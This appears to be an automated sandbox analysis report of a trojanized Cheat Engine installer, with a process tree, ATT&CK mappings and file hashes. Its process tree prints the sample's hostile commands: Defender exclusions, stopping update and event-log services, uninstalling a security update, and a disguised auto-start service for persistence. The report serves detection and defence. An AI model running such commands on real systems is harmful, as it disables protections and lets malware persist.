Token: SeTcbPrivilege	3480	cheatengine-x86_64-SSE4-AVX2.exe
Token: SeLoadDriverPrivilege	3480	cheatengine-x86_64-SSE4-AVX2.exe
Token: SeCreateGlobalPrivilege	3480	cheatengine-x86_64-SSE4-AVX2.exe
Token: SeLockMemoryPrivilege	3480	cheatengine-x86_64-SSE4-AVX2.exe
Token: 33	3480	cheatengine-x86_64-SSE4-AVX2.exe
Token: SeSecurityPrivilege	3480	cheatengine-x86_64-SSE4-AVX2.exe
Token: SeTakeOwnershipPrivilege	3480	cheatengine-x86_64-SSE4-AVX2.exe
Token: SeManageVolumePrivilege	3480	cheatengine-x86_64-SSE4-AVX2.exe
Token: SeBackupPrivilege	3480	cheatengine-x86_64-SSE4-AVX2.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4912	CheatEngine75.tmp
3668	CheatEngine75.tmp
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1812	CheatEngine75.exe

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 1812 wrote to memory of 320	1812	CheatEngine75.exe	71
PID 1812 wrote to memory of 320	1812	CheatEngine75.exe	71
PID 1812 wrote to memory of 320	1812	CheatEngine75.exe	71
PID 1812 wrote to memory of 3836	1812	CheatEngine75.exe	73
PID 1812 wrote to memory of 3836	1812	CheatEngine75.exe	73
PID 1812 wrote to memory of 2560	1812	CheatEngine75.exe	74
PID 1812 wrote to memory of 2560	1812	CheatEngine75.exe	74
PID 1812 wrote to memory of 3996	1812	CheatEngine75.exe	75
PID 1812 wrote to memory of 3996	1812	CheatEngine75.exe	75
PID 1812 wrote to memory of 3996	1812	CheatEngine75.exe	75
PID 3996 wrote to memory of 4912	3996	CheatEngine75.exe	76
PID 3996 wrote to memory of 4912	3996	CheatEngine75.exe	76
PID 3996 wrote to memory of 4912	3996	CheatEngine75.exe	76
PID 4712 wrote to memory of 4132	4712	cmd.exe	86
PID 4712 wrote to memory of 4132	4712	cmd.exe	86
PID 4912 wrote to memory of 3756	4912	CheatEngine75.tmp	114
PID 4912 wrote to memory of 3756	4912	CheatEngine75.tmp	114
PID 4912 wrote to memory of 3756	4912	CheatEngine75.tmp	114
PID 3756 wrote to memory of 3668	3756	CheatEngine75.exe	115
PID 3756 wrote to memory of 3668	3756	CheatEngine75.exe	115
PID 3756 wrote to memory of 3668	3756	CheatEngine75.exe	115
PID 3668 wrote to memory of 3348	3668	CheatEngine75.tmp	116
PID 3668 wrote to memory of 3348	3668	CheatEngine75.tmp	116
PID 3348 wrote to memory of 2976	3348	net.exe	118
PID 3348 wrote to memory of 2976	3348	net.exe	118
PID 3668 wrote to memory of 1952	3668	CheatEngine75.tmp	121
PID 3668 wrote to memory of 1952	3668	CheatEngine75.tmp	121
PID 1952 wrote to memory of 2268	1952	net.exe	120
PID 1952 wrote to memory of 2268	1952	net.exe	120
PID 3668 wrote to memory of 1632	3668	CheatEngine75.tmp	122
PID 3668 wrote to memory of 1632	3668	CheatEngine75.tmp	122
PID 3668 wrote to memory of 4788	3668	CheatEngine75.tmp	124
PID 3668 wrote to memory of 4788	3668	CheatEngine75.tmp	124
PID 3668 wrote to memory of 2824	3668	CheatEngine75.tmp	126
PID 3668 wrote to memory of 2824	3668	CheatEngine75.tmp	126
PID 3668 wrote to memory of 2052	3668	CheatEngine75.tmp	128
PID 3668 wrote to memory of 2052	3668	CheatEngine75.tmp	128
PID 4256 wrote to memory of 3688	4256	cmd.exe	132
PID 4256 wrote to memory of 3688	4256	cmd.exe	132
PID 3668 wrote to memory of 2748	3668	CheatEngine75.tmp	152
PID 3668 wrote to memory of 2748	3668	CheatEngine75.tmp	152
PID 3668 wrote to memory of 2748	3668	CheatEngine75.tmp	152
PID 3468 wrote to memory of 4148	3468	VC_redist.x64.exe	144
PID 3468 wrote to memory of 4148	3468	VC_redist.x64.exe	144
PID 3468 wrote to memory of 4148	3468	VC_redist.x64.exe	144
PID 3468 wrote to memory of 4148	3468	VC_redist.x64.exe	144
PID 3468 wrote to memory of 4148	3468	VC_redist.x64.exe	144
PID 3468 wrote to memory of 4148	3468	VC_redist.x64.exe	144
PID 3468 wrote to memory of 4148	3468	VC_redist.x64.exe	144
PID 3468 wrote to memory of 4148	3468	VC_redist.x64.exe	144
PID 3468 wrote to memory of 4148	3468	VC_redist.x64.exe	144
PID 3668 wrote to memory of 4220	3668	CheatEngine75.tmp	154
PID 3668 wrote to memory of 4220	3668	CheatEngine75.tmp	154
PID 3668 wrote to memory of 4220	3668	CheatEngine75.tmp	154
PID 3668 wrote to memory of 1008	3668	CheatEngine75.tmp	155
PID 3668 wrote to memory of 1008	3668	CheatEngine75.tmp	155
PID 4912 wrote to memory of 4532	4912	CheatEngine75.tmp	157
PID 4912 wrote to memory of 4532	4912	CheatEngine75.tmp	157
PID 4912 wrote to memory of 4532	4912	CheatEngine75.tmp	157
PID 4532 wrote to memory of 3480	4532	Cheat Engine.exe	158
PID 4532 wrote to memory of 3480	4532	Cheat Engine.exe	158

C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe
"C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1812
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdQB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAbQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAegBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAeQB5ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:320
- C:\Users\Admin\AppData\Roaming\fz_ServerSession.exe
  "C:\Users\Admin\AppData\Roaming\fz_ServerSession.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3836
- C:\Users\Admin\AppData\Roaming\conhost_fz.exe
  "C:\Users\Admin\AppData\Roaming\conhost_fz.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:2560
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4712
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4132
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4708
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2052
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3768
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:236
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:4748
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1092
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "driverupdate"
    3⤵
    - Launches sc.exe
    PID:1720
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3228
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5016
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1208
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:768
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3688
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "driverupdate"
    3⤵
    - Launches sc.exe
    PID:5068
- C:\Users\Admin\AppData\Roaming\CheatEngine75.exe
  "C:\Users\Admin\AppData\Roaming\CheatEngine75.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3996
- - C:\Users\Admin\AppData\Local\Temp\is-D0J5O.tmp\CheatEngine75.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-D0J5O.tmp\CheatEngine75.tmp" /SL5="$C0210,2335682,780800,C:\Users\Admin\AppData\Roaming\CheatEngine75.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks for any installed AV software in registry
    - Checks processor information in registry
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4912
  - - C:\Users\Admin\AppData\Local\Temp\is-LJROQ.tmp\CheatEngine75.exe
      "C:\Users\Admin\AppData\Local\Temp\is-LJROQ.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3756
    - - C:\Users\Admin\AppData\Local\Temp\is-83L42.tmp\CheatEngine75.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-83L42.tmp\CheatEngine75.tmp" /SL5="$8004E,26511452,832512,C:\Users\Admin\AppData\Local\Temp\is-LJROQ.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:3668
      - C:\Windows\SYSTEM32\net.exe
        
        "net" stop BadlionAntic
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3348
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop BadlionAntic
        7⤵
        
        PID:2976
      - C:\Windows\SYSTEM32\net.exe
        
        "net" stop BadlionAnticheat
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1952
      - C:\Windows\SYSTEM32\sc.exe
        
        "sc" delete BadlionAntic
        6⤵
        Launches sc.exe
        
        PID:1632
      - C:\Windows\SYSTEM32\sc.exe
        
        "sc" delete BadlionAnticheat
        6⤵
        Launches sc.exe
        
        PID:4788
      - C:\Users\Admin\AppData\Local\Temp\is-OUNE1.tmp\_isetup\_setup64.tmp
        
        helper 105 0x3CC
        6⤵
        Executes dropped EXE
        
        PID:2824
      - C:\Windows\system32\icacls.exe
        
        "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
        6⤵
        Modifies file permissions
        
        PID:2052
      - C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe
        
        "C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe" /SETUP
        6⤵
        Executes dropped EXE
        
        PID:2748
      - C:\Program Files\Cheat Engine 7.5\windowsrepair.exe
        
        "C:\Program Files\Cheat Engine 7.5\windowsrepair.exe" /s
        6⤵
        Executes dropped EXE
        
        PID:4220
      - C:\Windows\system32\icacls.exe
        
        "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
        6⤵
        Modifies file permissions
        
        PID:1008
  - - C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe
      "C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4532
    - - C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64-SSE4-AVX2.exe
        
        "C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64-SSE4-AVX2.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3480

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3468
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4224
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2892
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4256
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4948
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1804
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4580
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:424
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4148
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:204
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BadlionAnticheat
1⤵
PID:2268

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
1⤵
PID:3688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe

Filesize
389KB

MD5
f921416197c2ae407d53ba5712c3930a

SHA1
6a7daa7372e93c48758b9752c8a5a673b525632b

SHA256
e31b233ddf070798cc0381cc6285f6f79ea0c17b99737f7547618dcfd36cdc0e

SHA512
0139efb76c2107d0497be9910836d7c19329e4399aa8d46bbe17ae63d56ab73004c51b650ce38d79681c22c2d1b77078a7d7185431882baf3e7bef473ac95dce

Download Submit
C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe

Filesize
236KB

MD5
9af96706762298cf72df2a74213494c9

SHA1
4b5fd2f168380919524ecce77aa1be330fdef57a

SHA256
65fa2ccb3ac5400dd92dda5f640445a6e195da7c827107260f67624d3eb95e7d

SHA512
29a0619093c4c0ecf602c861ec819ef16550c0607df93067eaef4259a84fd7d40eb88cd5548c0b3b265f3ce5237b585f508fdd543fa281737be17c0551163bd4

Download Submit
C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe

Filesize
236KB

MD5
9af96706762298cf72df2a74213494c9

SHA1
4b5fd2f168380919524ecce77aa1be330fdef57a

SHA256
65fa2ccb3ac5400dd92dda5f640445a6e195da7c827107260f67624d3eb95e7d

SHA512
29a0619093c4c0ecf602c861ec819ef16550c0607df93067eaef4259a84fd7d40eb88cd5548c0b3b265f3ce5237b585f508fdd543fa281737be17c0551163bd4

Download Submit
C:\Program Files\Cheat Engine 7.5\allochook-i386.dll

Filesize
328KB

MD5
19d52868c3e0b609dbeb68ef81f381a9

SHA1
ce365bd4cf627a3849d7277bafbf2f5f56f496dc

SHA256
b96469b310ba59d1db320a337b3a8104db232a4344a47a8e5ae72f16cc7b1ff4

SHA512
5fbd53d761695de1dd6f0afd0964b33863764c89692345cab013c0b1b6332c24dcf766028f305cc87d864d17229d7a52bf19a299ca136a799053c368f21c8926

Download Submit
C:\Program Files\Cheat Engine 7.5\allochook-x86_64.dll

Filesize
468KB

MD5
daa81711ad1f1b1f8d96dc926d502484

SHA1
7130b241e23bede2b1f812d95fdb4ed5eecadbfd

SHA256
8422be70e0ec59c962b35acf8ad80671bcc8330c9256e6e1ec5c07691388cd66

SHA512
9eaa8e04ad7359a30d5e2f9256f94c1643d4c3f3c0dff24d6cd9e31a6f88cb3b470dd98f01f8b0f57bb947adc3d45c35749ed4877c7cbbbcc181145f0c361065

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\addtonewgroup.lua

Filesize
1KB

MD5
3e20f1013fb48a67fe59bede7b8e341b

SHA1
8c8a4cb49c3b29db2c47f84aafd0416101722bfe

SHA256
96e4429192f9ab26f8bf9f9429f36b388aa69c3624781c61ea6df7e1bca9b49b

SHA512
99cf3f88c8b06da0dbe8085dee796bec7a9533990a55fbce7524a4f941b5ecf0e8ec975a4b032eb2aaabd116c0804995a75036c98a5e4058f25d78d08a11f3f2

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\alternateSpeedhack.LUA

Filesize
7KB

MD5
459b793e0dc43a993f03d8b612f67cec

SHA1
f14ae9afbe97af534a11bf98ac1cc096269f1474

SHA256
e2cbb4c2f46305bb07d84222231012fd4c800fe8e1b43e0aa1af9b6c5d111f7f

SHA512
1740068e3419d153ecbd9d1a6aada20aabe71915e7422dce1a83e616e8d2a1084922a81741591a682531e1f8146e437d8688521c7707a4909e5721768a3f956e

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\autosave.lua

Filesize
9KB

MD5
40d6bfe593194cf938e19622a3c13a5e

SHA1
761257e8ef492431cf0e04dbca396fabb25fe1ae

SHA256
c4cef60489b067c8e7abcdd5594643a27d0720b21523753dd462d53024287116

SHA512
1d1aaa9de74b0bb08cc4ceced5dbfa4c589347eac098d7ae013d5a1beaae0eeaca4d314e2591560c6df14a93dd4e9316ca317d21efadcca57d11eee72f4c6e16

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\bigendian.lua

Filesize
7KB

MD5
e76fcd2ecd5b956d4579a676aa3eea01

SHA1
49ecba5ccc531a40ad7805a126d38b44b4a36576

SHA256
0339ba0043af5c058cf3a19de9f90312d18f6bb2728f454ef403b531bd57ae42

SHA512
8443c213d4a626a358631f76a0cc4c106543ce58c94d34a96b88574b3e32ae742f28878b259a17823ca07ec521b06e32e572e7bc77e10951bc0984b07c0571c6

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\ceshare_account.lua

Filesize
6KB

MD5
0b5180bd64689788ebeaa8e705a264ac

SHA1
43a5cc401ee6c4ff4a94697112b1bc1d4345fc19

SHA256
8fd38a5e6c0408ca77e0e7a0ee179b4391758ec6da94ea289e3a2cbc1ab1ec59

SHA512
cc26e2e36b93bf89aa16c744b2db60d855de616db7a67f4fb24135545104459338c3edeab42bb316b1ecb0db9e31970b1415a1bf638ea3e53ae31471330aeadb

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\ceshare_comments.lua

Filesize
3KB

MD5
0d4d1b597712015ef1b0ec8adc26495f

SHA1
3584779c06619f545b47a27703aa2f47455d50de

SHA256
89c8fccc16d2aa0a3004dc1b477a5c1dcbba539769b2a4558f7c7d9b9809b133

SHA512
ae26bbb2c3f74c143a01ec3b296a26699c679d51bc68c8c7b8c460616d1a0aa065500ebca83e972a720bd7a3c5a7b63a673eaecef1391a2e717208ef8da0796f

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\ceshare_fulltablelist.lua

Filesize
12KB

MD5
665bb2e55e2a13157d1dbfef05d1b905

SHA1
408fea33f574bd0fa9e4cb71958363398e0699bc

SHA256
da6ecce3db7d305813ffe80ca994663d43f1068f0fb67399a4c66d1f28684bfa

SHA512
8fe95e22680e1e802d0ceeecbbd6b098526468b8cf4d838301d2833247d94e4f3b3a4b76a68f9faaa2177b42ff2ffea2df46ef56a4a0ce501d126135ce8ee985

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\ceshare_permissions.lua

Filesize
3KB

MD5
65c8d4eddfe05267a72eae3ddb2cf02a

SHA1
eef2928d355c8b669f8854da37162ba1fe32740a

SHA256
15b0c7682e5e8d2e2c2b8cb00c0c03b7dfa9439ac80c37f8e96a4f86652246f9

SHA512
1c151d5a44482362430fbc6ed4550671ad96e768942e4ec2a4c487182bed9d0326a0d40a1ac43f2c8a3de1e18e33b055ce7126d80fee9b5b7091ed83a22a41ad

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\ceshare_processlistextention.lua

Filesize
9KB

MD5
607a7c1ab93026d94916f21779d0d645

SHA1
3d5a64b256fc44086e6e190ea0bc45b5999e1979

SHA256
ea61eea6289c2feba7b7d0cc24db5277e383102f24784e6bf7254af41829599c

SHA512
d6749e2dbe46466a1cb1c464ce3f237836ef6b572ef897c7f5c9d12f80a6c0c7a5dfea54c3499a91e14b29c8bbf0809cce433c379f9e5dc0072e436f641c59ad

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\ceshare_publish.lua

Filesize
20KB

MD5
87cd08b16891e0dbe3d47bb71ca91691

SHA1
55d98338b4aa0df3566cd2e721b3d3f86a3836aa

SHA256
6bfd35aa64ab566ddb68d0675ad3b4a093649010a9c30df3a30a7f9dc2ed7702

SHA512
847becf1d3066a3e185001035b68496b91876bdeb323734782c41fc9b2bdf665bf33c728cebbe78e820654d87b1969c09b5d1faed7498538cb5f761984108614

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\ceshare_querycheats.lua

Filesize
24KB

MD5
623b89f1e13c54a1f560b254317948b5

SHA1
b90e2de7a5cff0b14738f2fb4f6a3a4e1ee1a17c

SHA256
0c6e90c2525f1560acea3f4bdae056d11df1c2f675c2335594dc80bb910a1b17

SHA512
f80cd50f860a5f8d5c6d6ab7ba8691b443da91573f3f0fc8d5b82b79556c5ac02accc610870ea61a886ecb8a4491457965d082f8f41df781ded1db84f7157a3f

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\ceshare_requests.lua

Filesize
5KB

MD5
6cf99831e2aaafb97e975eae06a705ff

SHA1
b6e71f7d3c779575598b65a6e4fb341344a3ddd2

SHA256
e9d57acb17502ac169deb37f211e472f68cd6e8a69e071d384b989fa45e9fa7f

SHA512
f6467c4c9dcab563dbb5a337c76616208d1a1058d704b222e616e5a0809a156b1a29198919f4bf0d40c55a6e972439722c02aac8a156c53572b6d7ef80986405

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\forms\BrowseCheats.FRM

Filesize
8KB

MD5
d4f5fe5a2f5feeb3d97b2fdf4ae7e6bc

SHA1
eef59c5a8aacd86f993e2bb3f8e5892817a9f7eb

SHA256
9cb25c63ab41be2ba3984df20686dd27bf937e029ebfaa56ebe88bac6dfc53b6

SHA512
b00e9467a5203b04a958a69b20152ad5907e5337a43e3ff8f9209a01d7874dd477bb8596e93b3acaf7354ee7ce76e742f4a72f598473a9c8cc36bbdbb240bb43

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\forms\CommentsOrRequests.FRM

Filesize
1KB

MD5
cd4d7aee15163ab407b4f18d8f93dcc3

SHA1
676e3eea53646f221dcb4c9b7dcc2cb5315f36bc

SHA256
d8de8120c14da094feddb24c46c3e729d99696ccce9c2d479797ffbbf34bd20b

SHA512
17ede3db62a9d2abfb8d2715e5ed816a7badf1eb7ead79e5b48ab6db7dcd8215b40cdd03d4a3cfd5ede4567fa5092d9f7406fb25bc82dcaa26cbea57c2207f69

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\forms\InitialSetup.FRM

Filesize
1KB

MD5
23cc858da49a7bda9e9fe3abf8d86d1d

SHA1
9d869496104acfff0c5cb572628085666dc53486

SHA256
d5786540891c411bc34a5505a6cee0e747df2e5cd410abfeb94e6d4169c85069

SHA512
b5650ab1ae463f97f5681dd3fdff7015c963703a7437ac5f71a158f3e0bdc045e69151897d0ec75aa9dd4ccac5475e6e492ce46a296bcab8c4c329720e3c002a

Download Submit
C:\Program Files\Cheat Engine 7.5\autorun\ceshare\forms\Permissions.FRM

Filesize
1KB

MD5
7ffd1e1b425636cfa08cda89429c69a6

SHA1
ec6a75fca2bc4f2e8cb7ab9644d1bedb1d686221

SHA256
44e9bc08a3f919da8689c4703e77324568f3902e95f8f3f92ccf234bcf7bf649

SHA512
dba72b7a8f1a3d72101e4f735e0cea1be8e72236a81e6fc2ce18e7f93715b5c1f21aa384790c7e0097a23aeb6d52e954ce7c7adf7c6189a855dcd6fadade7c9b

Download Submit
